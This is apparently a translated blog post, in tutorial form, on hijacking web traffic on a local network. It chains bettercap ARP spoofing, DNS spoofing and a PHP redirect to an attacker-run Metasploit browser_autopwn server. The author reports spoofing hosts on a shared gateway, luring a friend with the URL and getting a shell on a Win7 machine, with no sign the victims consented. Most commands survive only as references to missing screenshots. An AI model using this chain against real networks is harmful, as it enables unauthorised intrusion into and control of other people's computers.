Intranet host webpage hijacking

Others 2021-03-29 07:47:16 views: null

Test host: kali 2016.2

工具:bettercap、metasploit、dnsspoof、armitage

initial preparation work

Bettercap is not integrated under kali, so we need to install it ourselves

The installation is complete

Start the postgresql service

 

Metasploit database initialization

 

 

Check the database link status, if it shows that the database is not connected, you can refer to: Portal to  connect to the database

 

 

Start armitage ( about armitage )

 

Prepare a hosts file (for DNS spoofing)

 

Change: I just tried it. Adding the port number to the hosts file seems to cause some unexpected problems. Here we change our thinking, go directly to the ip address without adding the port number, then open the apache service, and then save the following code as index.php in the root directory (/var/www/html/)

<?php header("Location:http://10.167.33.1:8080"); ?>

In this way, after DNS spoofing, it will jump to the specified ip, and then redirect to our payload via php.

Another method is to directly change the port number to port 80 when starting the browser to automatically attack the plug-in below.

 

/**************************************zhun bei wan cheng ******* **********************************/


Start the browser automatic attack module: browser_autopwn

 

Wait for him to load all the payloads

 

 

arp attack (execution: bettercap -X)

 

DNS spoofing (forgot that the screenshots are supplemented so the parameters are a bit different)

Now we are waiting for the fish to be hooked. Now the host under the same gateway will parse it into our URL no matter what URL is opened. When he opens our URL, the program will automatically verify which pay is available

Our DNS spoofing is only effective for hosts under the same gateway, but the URL we use in total can only be used to reach our address. In the picture below, you can see that there are two win10 hosts spoofed by arp+dns, and the two Android win7 hosts I sent this URL to my friend. Of course, he is also on the intranet. If we need to attack a host on the public network, we can refer to how the shell of the public network returns to Kali on the internal network  . Finally, a win7 browser successfully ran our payload and returned to the shell.

check the file

 

Screenshots

 

Of course, the functions are far more than these, and more fun can be explored by yourself.

Guess you like

Origin blog.csdn.net/THMAIL/article/details/107736662
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com